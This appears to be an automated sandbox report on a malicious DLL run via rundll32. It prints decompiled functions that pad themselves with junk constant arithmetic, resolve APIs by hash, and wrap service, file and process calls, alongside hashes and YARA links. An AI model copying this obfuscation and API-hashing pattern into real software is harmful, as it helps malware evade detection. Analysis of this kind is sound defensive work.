			E1001A1D9(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, int _a16, short* _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t48;
				void* _t60;
				signed int _t62;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				E10022523(_t48);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v32 = 0xc7e348;
				_v20 = 0x108854;
				_v20 = _v20 + 0xffffaa5a;
				_v20 = _v20 ^ 0x0016e205;
				_v12 = 0x2fa6a1;
				_v12 = _v12 ^ 0x32ad7830;
				_t62 = 5;
				_v12 = _v12 * 0x54;
				_v12 = _v12 ^ 0x92f839ec;
				_v16 = 0x6695de;
				_v16 = _v16 * 0x61;
				_v16 = _v16 ^ 0x26d3982b;
				_v8 = 0xfe457a;
				_v8 = _v8 * 0x1c;
				_v8 = _v8 / _t62;
				_v8 = _v8 + 0xffffd7e2;
				_v8 = _v8 ^ 0x058c81d4;
				E10002309(0x229, _t62, _t62, 0x540b902b, _t62, 0x21ce39be);
				_t60 = OpenServiceW(_a12, _a20, _a16); // executed
				return _t60;
			}

0x1001a1df
0x1001a1e2
0x1001a1e5
0x1001a1e8
0x1001a1eb
0x1001a1f0
0x1001a1f5
0x1001a1fc
0x1001a202
0x1001a209
0x1001a210
0x1001a217
0x1001a21e
0x1001a225
0x1001a232
0x1001a239
0x1001a23c
0x1001a243
0x1001a255
0x1001a258
0x1001a25f
0x1001a26a
0x1001a277
0x1001a27a
0x1001a281
0x1001a294
0x1001a2a5
0x1001a2aa

APIs

OpenServiceW.ADVAPI32(0016E205,00000000,00000000), ref: 1001A2A5

Memory Dump Source

Source File: 00000005.00000002.365391011.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.365378189.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.365465077.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 840192035c919cdef4810d782994658ce17bfcf84a61f68bdcf29756b0cc9f76
Instruction ID: fedd1cc606632efae3d400c93a220e8e98036f636a1aec4a19a6fd3869fc071c
Opcode Fuzzy Hash: 840192035c919cdef4810d782994658ce17bfcf84a61f68bdcf29756b0cc9f76
Instruction Fuzzy Hash: 122128B1C0020DFFCF04CFE8D946AAEBBB5EB44300F108199E914A6260D7715B549F50

Uniqueness

Uniqueness Score: -1.00%

Function 10017708, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 100177B6

Memory Dump Source

Source File: 00000005.00000002.365391011.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.365378189.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.365465077.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 793664888eb73d009d9e5b6ba31e7172053ff3348b2e2b85015c814eee7fae41
Instruction ID: e01db37ee4e11aec0ed8fe9f4a455c9f05bd25de310d07c039ce80a3f7d39afa
Opcode Fuzzy Hash: 793664888eb73d009d9e5b6ba31e7172053ff3348b2e2b85015c814eee7fae41
Instruction Fuzzy Hash: CC1134B6D00209FBDB08CFA4D94A9AEBBB4FF44304F108189E814AB251E3B09B108F91

Uniqueness

Uniqueness Score: -1.00%

Function 10004248, Relevance: 1.5, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10004248() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _t52;
				signed int _t53;

				_v24 = _v24 & 0x00000000;
				_v32 = 0xac8d12;
				_v28 = 0x59a528;
				_v12 = 0xae5295;
				_v12 = _v12 << 2;
				_t52 = 0xb;
				_v12 = _v12 / _t52;
				_v12 = _v12 ^ 0x0038a8c1;
				_v20 = 0xfd2184;
				_v20 = _v20 ^ 0xb7361747;
				_v20 = _v20 ^ 0xb7cc531f;
				_v8 = 0xac9b8;
				_t53 = 9;
				_v8 = _v8 / _t53;
				_v8 = _v8 << 0xd;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 ^ 0x00077309;
				_v16 = 0x4164cf;
				_v16 = _v16 << 2;
				_v16 = _v16 ^ 0x010bebe7;
				E10002309(0x37f, _t53, _t53, 0x8b1a77d6, _t53, 0x9c9047d0);
				ExitProcess(0);
			}

APIs

ExitProcess.KERNEL32(00000000), ref: 100042F1

Memory Dump Source

Source File: 00000005.00000002.365391011.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.365378189.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.365465077.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction ID: dec05fa3737df580d58ff145636bc0451a72c06ba1d5dcadd23311741e886f9d
Opcode Fuzzy Hash: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction Fuzzy Hash: B91128B5E00208EBDB44DFE5D94AADEBBF1FB44308F208089E515A7240D7B45B18CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1001A566, Relevance: 1.5, APIs: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E1001A566(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t31;
				int _t39;

				_push(_a4);
				_push(__ecx);
				E10022523(_t31);
				_v20 = 0xa80c31;
				_v20 = _v20 * 0x6c;
				_v20 = _v20 ^ 0x46e6f799;
				_v16 = 0x35d7e6;
				_v16 = _v16 << 0xd;
				_v16 = _v16 ^ 0xbafefac0;
				_v12 = 0x55f9ae;
				_v12 = _v12 + 0xffffbfa6;
				_v12 = _v12 | 0xf8d2795e;
				_v12 = _v12 ^ 0xf8daa7f9;
				_v8 = 0xe46cfe;
				_v8 = _v8 ^ 0xeb94df75;
				_v8 = _v8 | 0xf69b0666;
				_v8 = _v8 ^ 0xfffa92dc;
				E10002309(0x148, __ecx, __ecx, 0x2237d547, __ecx, 0x9c9047d0);
				_t39 = FindCloseChangeNotification(_a4); // executed
				return _t39;
			}

0x1001a56c
0x1001a570
0x1001a571
0x1001a576
0x1001a58a
0x1001a58d
0x1001a594
0x1001a59b
0x1001a59f
0x1001a5a6
0x1001a5ad
0x1001a5b4
0x1001a5bb
0x1001a5c2
0x1001a5c9
0x1001a5d0
0x1001a5d7
0x1001a5f6
0x1001a601
0x1001a606

APIs

FindCloseChangeNotification.KERNEL32(F8DAA7F9), ref: 1001A601

Memory Dump Source

Source File: 00000005.00000002.365391011.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.365378189.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.365465077.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 2512bc8cf98a9556459c8d1695ff192ee3e01f460f93b2f36ca59e351fe401b9
Instruction ID: 916d80f1436c55e495bde87e87ea32654bf5eec04e964754689aa7ec780072d2
Opcode Fuzzy Hash: 2512bc8cf98a9556459c8d1695ff192ee3e01f460f93b2f36ca59e351fe401b9
Instruction Fuzzy Hash: 1F11F3B5C1030DFBCB18DFE8D8869AEBBB4EF44304F108698A855A6261D3B56B158F91

Uniqueness

Uniqueness Score: -1.00%

Function 100117CB, Relevance: 1.3, APIs: 1, Instructions: 56
stringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E100117CB(WCHAR* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t44;
				int _t55;
				signed int _t57;
				WCHAR* _t62;

				_push(_a8);
				_t62 = __ecx;
				_push(_a4);
				_push(__ecx);
				E10022523(_t44);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x2c5dd9;
				_v28 = 0x29a411;
				_v16 = 0xb6013c;
				_v16 = _v16 >> 2;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x05bceb0d;
				_v12 = 0xa7496a;
				_t57 = 7;
				_v12 = _v12 * 0x55;
				_v12 = _v12 | 0x1a205192;
				_v12 = _v12 ^ 0x3fab9f8f;
				_v8 = 0xf5055a;
				_v8 = _v8 / _t57;
				_v8 = _v8 + 0xa16;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 ^ 0x1132ba81;
				_v20 = 0xaea409;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x2ba3ef66;
				E10002309(0xb8, _t57, _t57, 0xbf157248, _t57, 0x9c9047d0);
				_t55 = lstrcmpiW(_t62, _a8); // executed
				return _t55;
			}

APIs

lstrcmpiW.KERNEL32(?,05BCEB0D,?,?,?,?,?,?,?,?,00000000), ref: 1001188D

Memory Dump Source

Source File: 00000005.00000002.365391011.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.365378189.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.365465077.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction ID: 1774797ce17004cd69ed458787da8d3b2b53829bebfee28bf73c73f1d8c62a15
Opcode Fuzzy Hash: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction Fuzzy Hash: 652127B5D0020CFFDB04DFA4D94A9EEBBB4EB44304F108189E425B7240E3B56B049F91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 5808 Parent PID: 4624 rundll32.exeCOMMON

Executed Functions

Function 1001F790, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 47
fileCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E1001F790(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t39;
				int _t48;
				signed int _t50;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E10022523(_t39);
				_v20 = 0x305f8e;
				_v20 = _v20 << 0x10;
				_v20 = _v20 ^ 0x5f829bc1;
				_v12 = 0x22b27e;
				_v12 = _v12 >> 6;
				_v12 = _v12 + 0x22ee;
				_v12 = _v12 ^ 0x000c4601;
				_v8 = 0xcd41e2;
				_v8 = _v8 + 0xd868;
				_v8 = _v8 + 0xd31f;
				_t50 = 0x5f;
				_v8 = _v8 / _t50;
				_v8 = _v8 ^ 0x000a754c;
				_v16 = 0x592d24;
				_v16 = _v16 | 0x8ee4cdff;
				_v16 = _v16 ^ 0x8efaae11;
				E10002309(_t50 + 0x2c, _t50, _t50, 0x7c50bf37, _t50, 0x9c9047d0);
				_t48 = DeleteFileW(_a8); // executed
				return _t48;
			}

APIs

DeleteFileW.KERNEL32(8EFAAE11), ref: 1001F839

Strings

", xrefs: 1001F7C8
$-Y, xrefs: 1001F802
Lu, xrefs: 1001F81A
Lu, xrefs: 1001F7EB

Memory Dump Source

Source File: 00000006.00000002.362746450.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.362733204.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.362781837.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: DeleteFile
String ID: $-Y$Lu$Lu$"
API String ID: 4033686569-1114282491
Opcode ID: 79e79a46e8f2bc5455ac9c56fc484e8236daa8409ea2d6f81888c9965c792b55
Instruction ID: 543db5e143fc82e0febe4e5b84228ca4fb2f9e33671b133290cd188315d44989
Opcode Fuzzy Hash: 79e79a46e8f2bc5455ac9c56fc484e8236daa8409ea2d6f81888c9965c792b55
Instruction Fuzzy Hash: 7911F5B6C00208FBDF09DFE4CC4A9AEBBB5FB54318F108588E915AA251D3B59B649F50

Uniqueness

Uniqueness Score: -1.00%

Function 1001FE9D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 26%

			E1001FE9D(void* __edx, intOrPtr _a4, intOrPtr _a8, int _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* __ecx;
				void* _t34;
				void* _t41;
				void* _t43;

				_push(_a16);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(0);
				E10022523(_t34);
				_v32 = 0xfebeef;
				_v28 = 0x6b4d4f;
				_v24 = 0;
				_v20 = 0x72d4d3;
				_v20 = _v20 + 0x7ce2;
				_v20 = _v20 ^ 0x0072d8bc;
				_v16 = 0x618a6;
				_v16 = _v16 + 0x2ac;
				_v16 = _v16 ^ 0x00083b16;
				_v12 = 0x17740f;
				_v12 = _v12 + 0x9d82;
				_v12 = _v12 ^ 0x0012bdfc;
				_v8 = 0xba692b;
				_v8 = _v8 ^ 0x31422697;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 ^ 0x0005552e;
				_push(0x21ce39be);
				_push(0xb53dc03);
				_push(_t42);
				_push(_t42);
				_t43 = 0x15;
				E10002309(_t43);
				_t41 = OpenSCManagerW(0, 0, _a16); // executed
				return _t41;
			}

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,10015191,?,?,?,?,?,?,?,?,?,?,0EB411AB), ref: 1001FF4C

Strings

OMk, xrefs: 1001FEC1

Memory Dump Source

Source File: 00000006.00000002.362746450.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.362733204.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.362781837.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: ManagerOpen
String ID: OMk
API String ID: 1889721586-456170103
Opcode ID: d1e283b7febcfdf4bdf6f7a65a9942aadab0ed956acd7b7642cec6b73cd3d803
Instruction ID: 1d80d5bf462f7d76a803e315767f53b854081a7213ef634c08bc69ad92fa0287
Opcode Fuzzy Hash: d1e283b7febcfdf4bdf6f7a65a9942aadab0ed956acd7b7642cec6b73cd3d803
Instruction Fuzzy Hash: 6D1113B2C0022CBBEB11DFA5D94A8EFBFB4EF44318F108188E91466201D3B95B149B91

Uniqueness

Uniqueness Score: -1.00%

Function 1001199D, Relevance: 1.6, APIs: 1, Instructions: 71
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E1001199D(void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, long _a20, long _a24, long _a28, long _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t55;
				void* _t68;
				signed int _t69;
				signed int _t70;

				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				E10022523(_t55);
				_v12 = 0xd4f63c;
				_v12 = _v12 >> 7;
				_v12 = _v12 << 0xf;
				_v12 = _v12 + 0xffffff46;
				_v12 = _v12 ^ 0xd4fb5fe8;
				_v8 = 0x967d18;
				_v8 = _v8 + 0xffffef98;
				_t69 = 0x14;
				_v8 = _v8 / _t69;
				_t70 = 0x4a;
				_v8 = _v8 / _t70;
				_v8 = _v8 ^ 0x000a0722;
				_v20 = 0x4653bc;
				_v20 = _v20 * 0x70;
				_v20 = _v20 ^ 0x1ec2604c;
				_v16 = 0x7577a9;
				_v16 = _v16 * 0x3c;
				_v16 = _v16 ^ 0x1b87e59a;
				E10002309(0x10a, _t70, _t70, 0xb484d458, _t70, 0x9c9047d0);
				_t68 = CreateFileW(_a4, _a24, _a28, 0, _a32, _a20, 0); // executed
				return _t68;
			}

APIs

CreateFileW.KERNEL32(D4FB5FE8,?,?,00000000,?,?,00000000), ref: 10011A79

Memory Dump Source

Source File: 00000006.00000002.362746450.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.362733204.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.362781837.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8a2d25935346c61c613306e80470cb2899605f47af9ce82126dccb95390cfdca
Instruction ID: 4460bfc2ec69cb6a9c9d4ae8ab6b4977e7447a0d843199ae8caee7af6f2384ce
Opcode Fuzzy Hash: 8a2d25935346c61c613306e80470cb2899605f47af9ce82126dccb95390cfdca
Instruction Fuzzy Hash: E021E27280021DFBDF05CF95D8498DEBFB6EF49354F108188F91466260D3B69A61AF90

Uniqueness

Uniqueness Score: -1.00%

Function 10017708, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 100177B6

Memory Dump Source

Source File: 00000006.00000002.362746450.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.362733204.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.362781837.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 793664888eb73d009d9e5b6ba31e7172053ff3348b2e2b85015c814eee7fae41
Instruction ID: e01db37ee4e11aec0ed8fe9f4a455c9f05bd25de310d07c039ce80a3f7d39afa
Opcode Fuzzy Hash: 793664888eb73d009d9e5b6ba31e7172053ff3348b2e2b85015c814eee7fae41
Instruction Fuzzy Hash: CC1134B6D00209FBDB08CFA4D94A9AEBBB4FF44304F108189E814AB251E3B09B108F91

Uniqueness

Uniqueness Score: -1.00%

Function 10004248, Relevance: 1.5, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10004248() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _t52;
				signed int _t53;

				_v24 = _v24 & 0x00000000;
				_v32 = 0xac8d12;
				_v28 = 0x59a528;
				_v12 = 0xae5295;
				_v12 = _v12 << 2;
				_t52 = 0xb;
				_v12 = _v12 / _t52;
				_v12 = _v12 ^ 0x0038a8c1;
				_v20 = 0xfd2184;
				_v20 = _v20 ^ 0xb7361747;
				_v20 = _v20 ^ 0xb7cc531f;
				_v8 = 0xac9b8;
				_t53 = 9;
				_v8 = _v8 / _t53;
				_v8 = _v8 << 0xd;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 ^ 0x00077309;
				_v16 = 0x4164cf;
				_v16 = _v16 << 2;
				_v16 = _v16 ^ 0x010bebe7;
				E10002309(0x37f, _t53, _t53, 0x8b1a77d6, _t53, 0x9c9047d0);
				ExitProcess(0);
			}

APIs

ExitProcess.KERNEL32(00000000), ref: 100042F1

Memory Dump Source

Source File: 00000006.00000002.362746450.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.362733204.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.362781837.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction ID: dec05fa3737df580d58ff145636bc0451a72c06ba1d5dcadd23311741e886f9d
Opcode Fuzzy Hash: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction Fuzzy Hash: B91128B5E00208EBDB44DFE5D94AADEBBF1FB44308F208089E515A7240D7B45B18CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 100117CB, Relevance: 1.3, APIs: 1, Instructions: 56
stringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E100117CB(WCHAR* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t44;
				int _t55;
				signed int _t57;
				WCHAR* _t62;

				_push(_a8);
				_t62 = __ecx;
				_push(_a4);
				_push(__ecx);
				E10022523(_t44);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x2c5dd9;
				_v28 = 0x29a411;
				_v16 = 0xb6013c;
				_v16 = _v16 >> 2;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x05bceb0d;
				_v12 = 0xa7496a;
				_t57 = 7;
				_v12 = _v12 * 0x55;
				_v12 = _v12 | 0x1a205192;
				_v12 = _v12 ^ 0x3fab9f8f;
				_v8 = 0xf5055a;
				_v8 = _v8 / _t57;
				_v8 = _v8 + 0xa16;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 ^ 0x1132ba81;
				_v20 = 0xaea409;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x2ba3ef66;
				E10002309(0xb8, _t57, _t57, 0xbf157248, _t57, 0x9c9047d0);
				_t55 = lstrcmpiW(_t62, _a8); // executed
				return _t55;
			}

APIs

lstrcmpiW.KERNEL32(?,05BCEB0D,?,?,?,?,?,?,?,?,00000000), ref: 1001188D

Memory Dump Source

Source File: 00000006.00000002.362746450.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.362733204.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.362781837.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction ID: 1774797ce17004cd69ed458787da8d3b2b53829bebfee28bf73c73f1d8c62a15
Opcode Fuzzy Hash: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction Fuzzy Hash: 652127B5D0020CFFDB04DFA4D94A9EEBBB4EB44304F108189E425B7240E3B56B049F91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 4248 Parent PID: 4692 rundll32.exeCOMMON

Executed Functions

Function 100231D2, Relevance: 1.6, APIs: 1, Instructions: 77
processCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E100231D2(void* __ecx, WCHAR* __edx, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16, struct _STARTUPINFOW* _a28, intOrPtr _a32, intOrPtr _a36, struct _PROCESS_INFORMATION* _a48, int _a52, intOrPtr _a56) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t54;
				int _t63;
				signed int _t65;
				WCHAR* _t71;

				_push(_a56);
				_t71 = __edx;
				_push(_a52);
				_push(_a48);
				_push(0);
				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(0);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				E10022523(_t54);
				_v28 = 0x2cec17;
				_v24 = 0;
				_v16 = 0x5aadab;
				_v16 = _v16 << 3;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 ^ 0x000031a8;
				_v12 = 0x82119f;
				_v12 = _v12 >> 2;
				_v12 = _v12 + 0xffff09c3;
				_t65 = 0x25;
				_v12 = _v12 / _t65;
				_v12 = _v12 ^ 0x0004d7f2;
				_v8 = 0x7cd8a6;
				_v8 = _v8 >> 6;
				_v8 = _v8 | 0x702a8e48;
				_v8 = _v8 + 0xffff37f0;
				_v8 = _v8 ^ 0x702d019b;
				_v20 = 0x367fb2;
				_v20 = _v20 + 0xffff7ba2;
				_v20 = _v20 ^ 0x003ae9c9;
				E10002309(0x2e4, _t65, _t65, 0xbf8568a3, _t65, 0x9c9047d0);
				_t63 = CreateProcessW(_t71, _a16, 0, 0, _a52, 0, 0, 0, _a28, _a48); // executed
				return _t63;
			}

APIs

CreateProcessW.KERNELBASE(000C0354,?,00000000,00000000,?,00000000,00000000,00000000,229292B4,?), ref: 100232BB

Memory Dump Source

Source File: 00000007.00000002.367640557.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.367633232.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.367682012.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction ID: db286c9e9bcad3bd2e87b522c53d89c9dfc5ed19f2ace101bae5327955dfaec9
Opcode Fuzzy Hash: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction Fuzzy Hash: 21311476801248BBCF65DF96CD49CDFBFB5FB89704F108188F914A6220D3B58A60DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10004248, Relevance: 1.5, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10004248() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _t52;
				signed int _t53;

				_v24 = _v24 & 0x00000000;
				_v32 = 0xac8d12;
				_v28 = 0x59a528;
				_v12 = 0xae5295;
				_v12 = _v12 << 2;
				_t52 = 0xb;
				_v12 = _v12 / _t52;
				_v12 = _v12 ^ 0x0038a8c1;
				_v20 = 0xfd2184;
				_v20 = _v20 ^ 0xb7361747;
				_v20 = _v20 ^ 0xb7cc531f;
				_v8 = 0xac9b8;
				_t53 = 9;
				_v8 = _v8 / _t53;
				_v8 = _v8 << 0xd;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 ^ 0x00077309;
				_v16 = 0x4164cf;
				_v16 = _v16 << 2;
				_v16 = _v16 ^ 0x010bebe7;
				E10002309(0x37f, _t53, _t53, 0x8b1a77d6, _t53, 0x9c9047d0);
				ExitProcess(0);
			}

APIs

ExitProcess.KERNEL32(00000000), ref: 100042F1

Memory Dump Source

Source File: 00000007.00000002.367640557.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.367633232.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.367682012.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction ID: dec05fa3737df580d58ff145636bc0451a72c06ba1d5dcadd23311741e886f9d
Opcode Fuzzy Hash: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction Fuzzy Hash: B91128B5E00208EBDB44DFE5D94AADEBBF1FB44308F208089E515A7240D7B45B18CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 100117CB, Relevance: 1.3, APIs: 1, Instructions: 56
stringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E100117CB(WCHAR* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t44;
				int _t55;
				signed int _t57;
				WCHAR* _t62;

				_push(_a8);
				_t62 = __ecx;
				_push(_a4);
				_push(__ecx);
				E10022523(_t44);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x2c5dd9;
				_v28 = 0x29a411;
				_v16 = 0xb6013c;
				_v16 = _v16 >> 2;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x05bceb0d;
				_v12 = 0xa7496a;
				_t57 = 7;
				_v12 = _v12 * 0x55;
				_v12 = _v12 | 0x1a205192;
				_v12 = _v12 ^ 0x3fab9f8f;
				_v8 = 0xf5055a;
				_v8 = _v8 / _t57;
				_v8 = _v8 + 0xa16;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 ^ 0x1132ba81;
				_v20 = 0xaea409;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x2ba3ef66;
				E10002309(0xb8, _t57, _t57, 0xbf157248, _t57, 0x9c9047d0);
				_t55 = lstrcmpiW(_t62, _a8); // executed
				return _t55;
			}

APIs

lstrcmpiW.KERNELBASE(?,05BCEB0D,?,?,?,?,?,?,?,?,00000000), ref: 1001188D

Memory Dump Source

Source File: 00000007.00000002.367640557.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.367633232.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.367682012.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction ID: 1774797ce17004cd69ed458787da8d3b2b53829bebfee28bf73c73f1d8c62a15
Opcode Fuzzy Hash: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
